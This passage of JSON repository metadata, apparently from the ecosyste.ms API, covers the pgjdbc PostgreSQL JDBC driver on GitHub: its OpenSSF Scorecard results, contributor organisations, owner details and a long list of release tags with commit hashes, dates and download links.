'release/42.5.x'","Warn: 'last push approval' is disabled on branch 'release/42.4.x'","Warn: 'last push approval' is disabled on branch 'release/42.3.x'","Warn: 'up-to-date branches' is disabled on branch 'master'","Warn: 'up-to-date branches' is disabled on branch 'release/42.5.x'","Warn: 'up-to-date branches' is disabled on branch 'release/42.4.x'","Warn: 'up-to-date branches' is disabled on branch 'release/42.3.x'","Info: status check found to merge onto on branch 'master'","Info: status check found to merge onto on branch 'release/42.5.x'","Info: status check found to merge onto on branch 'release/42.4.x'","Info: status check found to merge onto on branch 'release/42.3.x'","Info: PRs are required in order to make changes on branch 'master'","Info: PRs are required in order to make changes on branch 'release/42.5.x'","Info: PRs are required in order to make changes on branch 'release/42.4.x'","Info: PRs are required in order to make changes on branch 'release/42.3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"30 out of 30 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 34 contributing companies or organizations","details":["Info: found contributions from: 2ndQuadrant, AXLEproject, JavaMoney, altametris, autostyle, aws, cerner, csutils, devexp-db, edb, enterprisedb, fedora-copr, gnulib-modules, jackdb, jugnicaragua, konflux-ci, libusual, lonocloud, mend, mojohaus, netceteragroup, netcracker, ngs-doo, oracle, pgbouncer, pgjdbc, postgres, python-progress, redhatofficial, release-engineering, roiai-org, rpm-software-management, w4software, yandex"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}}]},"last_synced_at":"2025-08-18T09:24:36.671Z","repository_id":2402865,"created_at":"2025-08-18T09:24:36.672Z","updated_at":"2025-08-18T09:24:36.672Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30540718,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-15T07:17:37.589Z","status":"ssl_error","status_checked_at":"2026-03-15T07:17:31.738Z","response_time":61,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"pgjdbc","name":"Postgresql JDBC","uuid":"1371956","kind":"organization","description":"Official JDBC driver for PostgreSQL","email":"pgsql-jdbc@postgresql.org","website":"http://jdbc.postgresql.org","location":"Canada","twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/1371956?v=4","repositories_count":12,"last_synced_at":"2025-05-18T13:01:52.520Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/pgjdbc","funding_links":[],"total_stars":2714,"followers":80,"following":0,"created_at":"2022-11-03T09:29:51.190Z","updated_at":"2025-05-18T13:01:52.520Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pgjdbc","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pgjdbc/repositories"},"tags":[{"name":"REL42.7.10","sha":"27571c8e18712e7fc6a007bd38ab8e3d6c309c0c","kind":"commit","published_at":"2026-02-11T18:55:11.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.10","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.10/manifests"},{"name":"REL42.7.9","sha":"79b784e3a63def9d12088471334399a53016d880","kind":"commit","published_at":"2026-01-15T18:02:37.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.9","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.9/manifests"},{"name":"REL42.7.8","sha":"9a5492d99ce43507e318ce4bb56030f74b773d48","kind":"commit","published_at":"2025-09-18T21:10:50.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.8","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.8/manifests"},{"name":"REL42.7.7","sha":"9217ed16cb2918ab1b6b9258ae97e6ede244d8a0","kind":"tag","published_at":"2025-06-11T10:13:07.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.7","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.7/manifests"},{"name":"REL42.7.7-rc1","sha":"9217ed16cb2918ab1b6b9258ae97e6ede244d8a0","kind":"tag","published_at":"2025-06-11T09:56:50.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.7-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.7-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.7-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.7-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.7-rc1/manifests"},{"name":"REL42.7.6","sha":"689708f96d446993cd264cbf5bd5696a726cf8b7","kind":"tag","published_at":"2025-05-28T10:24:47.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.6","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.6/manifests"},{"name":"REL42.7.6-rc1","sha":"689708f96d446993cd264cbf5bd5696a726cf8b7","kind":"tag","published_at":"2025-05-28T10:13:48.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.6-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.6-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.6-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.6-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.6-rc1/manifests"},{"name":"REL42.7.5","sha":"94a1693a61d612dcdbb9c4d01c1e217326a0c044","kind":"tag","published_at":"2025-01-14T15:02:03.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.5/manifests"},{"name":"REL42.7.5-rc1","sha":"94a1693a61d612dcdbb9c4d01c1e217326a0c044","kind":"tag","published_at":"2025-01-14T14:58:53.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.5-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.5-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.5-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.5-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.5-rc1/manifests"},{"name":"REL42.7.4","sha":"a23fa7077f220180e2db365abf3144f84b6033fb","kind":"tag","published_at":"2024-08-22T16:44:41.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.4/manifests"},{"name":"REL42.7.4-rc1","sha":"a23fa7077f220180e2db365abf3144f84b6033fb","kind":"tag","published_at":"2024-08-22T14:09:21.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.4-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.4-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.4-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.4-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.4-rc1/manifests"},{"name":"REL42.2.30-rc1","sha":"c6bbbc2ccc44cf099bf6b5973896a97636c5e32b","kind":"tag","published_at":"2024-04-09T12:32:45.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.30-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.30-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.30-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.30-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.30-rc1/manifests"},{"name":"REL42.7.3","sha":"818953a2b30480ecc874f812e46fcb82d1a395fd","kind":"tag","published_at":"2024-03-14T18:45:06.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.3/manifests"},{"name":"REL42.7.3-rc1","sha":"818953a2b30480ecc874f812e46fcb82d1a395fd","kind":"tag","published_at":"2024-03-14T18:42:34.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.3-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.3-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.3-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.3-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.3-rc1/manifests"},{"name":"REL42.6.2","sha":"6fa2ca102b842cebad9b45db7c147e6d41d3b93d","kind":"tag","published_at":"2024-03-13T18:57:59.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.6.2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.2/manifests"},{"name":"REL42.6.2-rc2","sha":"6fa2ca102b842cebad9b45db7c147e6d41d3b93d","kind":"tag","published_at":"2024-03-13T18:57:11.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.6.2-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.6.2-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.6.2-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.2-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.2-rc2/manifests"},{"name":"REL42.5.6","sha":"b9953dc45e1607ec1db292f59768f857b75386ef","kind":"tag","published_at":"2024-03-13T18:48:27.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.6","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.6/manifests"},{"name":"REL42.5.6-rc1","sha":"b9953dc45e1607ec1db292f59768f857b75386ef","kind":"tag","published_at":"2024-03-13T18:46:02.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.6-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.6-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.6-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.6-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.6-rc1/manifests"},{"name":"REL42.4.5","sha":"a4a957ac0e9ee93cdae2fd51f782cda3b7be711b","kind":"tag","published_at":"2024-03-13T18:39:31.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.5/manifests"},{"name":"REL42.3.10","sha":"b0326938dd31d995aedaaca830d974ec05881d75","kind":"tag","published_at":"2024-03-13T18:33:19.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.10","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.10/manifests"},{"name":"REL42.3.10-rc1","sha":"b0326938dd31d995aedaaca830d974ec05881d75","kind":"tag","published_at":"2024-03-13T18:30:47.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.10-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.10-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.10-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.10-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.10-rc1/manifests"},{"name":"REL42.2.29","sha":"d8fadb386f95cd6ab08f9c59fde3ca4b8af04eac","kind":"tag","published_at":"2024-03-13T18:27:39.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.29","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.29/manifests"},{"name":"REL42.2.29-rc1","sha":"d8fadb386f95cd6ab08f9c59fde3ca4b8af04eac","kind":"tag","published_at":"2024-03-13T18:21:48.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.29-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.29-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.29-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.29-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.29-rc1/manifests"},{"name":"REL42.4.5-rc1","sha":"a4a957ac0e9ee93cdae2fd51f782cda3b7be711b","kind":"tag","published_at":"2024-03-08T14:02:38.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.5-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.5-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.5-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.5-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.5-rc1/manifests"},{"name":"REL42.2.28","sha":"990d63f6be401ab40de5eb303a75924c9e71903c","kind":"tag","published_at":"2024-02-21T00:47:40.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.28","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.28/manifests"},{"name":"REL42.2.28-rc1","sha":"990d63f6be401ab40de5eb303a75924c9e71903c","kind":"tag","published_at":"2024-02-21T00:45:58.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.28-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.28-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.28-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.28-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.28-rc1/manifests"},{"name":"REL42.3.9","sha":"d93c74127f5aebda2baa8fcefed4f0b4dfe81d95","kind":"tag","published_at":"2024-02-21T00:42:55.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.9","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.9/manifests"},{"name":"REL42.3.9-rc1","sha":"d93c74127f5aebda2baa8fcefed4f0b4dfe81d95","kind":"tag","published_at":"2024-02-21T00:42:10.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.9-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.9-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.9-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.9-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.9-rc1/manifests"},{"name":"REL42.4.4","sha":"fe002b31f2c7dcf7e2fe75fe7fd18df4e4503abf","kind":"tag","published_at":"2024-02-21T00:37:52.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.4/manifests"},{"name":"REL42.4.4-rc1","sha":"fe002b31f2c7dcf7e2fe75fe7fd18df4e4503abf","kind":"tag","published_at":"2024-02-21T00:37:11.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.4-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.4-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.4-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.4-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.4-rc1/manifests"},{"name":"REL42.5.5","sha":"475e3e2af3033c666fc1c0015159b35455118ae5","kind":"tag","published_at":"2024-02-21T00:25:02.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.5/manifests"},{"name":"REL42.5.5-rc1","sha":"475e3e2af3033c666fc1c0015159b35455118ae5","kind":"tag","published_at":"2024-02-21T00:24:27.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.5-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.5-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.5-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.5-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.5-rc1/manifests"},{"name":"REL42.6.1","sha":"d368b1cc5fbfc9750151f87d78e12db97e13af0e","kind":"tag","published_at":"2024-02-21T00:16:34.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.6.1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.1/manifests"},{"name":"REL42.6.1-rc1","sha":"d368b1cc5fbfc9750151f87d78e12db97e13af0e","kind":"tag","published_at":"2024-02-21T00:15:35.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.6.1-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.6.1-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.6.1-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.1-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.1-rc1/manifests"},{"name":"REL42.7.2-rc5","sha":"06abfb78a627277a580d4df825f210e96a4e14ee","kind":"tag","published_at":"2024-02-20T23:53:58.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.2-rc5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.2-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.2-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc5/manifests"},{"name":"REL42.7.2-rc4","sha":"06abfb78a627277a580d4df825f210e96a4e14ee","kind":"tag","published_at":"2024-02-20T16:35:22.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.2-rc4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.2-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.2-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc4/manifests"},{"name":"REL42.7.2-rc3","sha":"06abfb78a627277a580d4df825f210e96a4e14ee","kind":"tag","published_at":"202